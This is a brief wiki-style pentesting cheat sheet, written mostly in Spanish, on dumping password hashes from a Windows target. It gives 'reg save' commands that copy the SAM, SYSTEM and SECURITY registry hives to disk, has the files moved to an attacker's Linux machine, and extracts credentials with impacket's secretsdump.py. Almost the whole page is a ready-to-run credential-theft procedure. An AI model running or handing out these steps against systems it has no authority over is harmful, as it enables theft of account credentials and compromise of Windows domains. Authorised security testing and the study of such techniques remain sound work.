Windows AD Download password files
Jump to navigation
Jump to search
1.- En el cmd de Windows de la maquina objetivo:
- reg save hklm\sam c:\SAM
- reg save hklm\system c:\SYSTEM
- reg save hklm\security c:\SECURITY
2.- Copiar los archivos a la maquina local (linux)
3.- Con impacket en la maquina local:
- secretsdump.py -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL
Alternative[edit]
https://www.ultimatewindowssecurity.com/blog/default.aspx?p=ec745f83-cdd2-4c20-9a31-2c1de6a9d049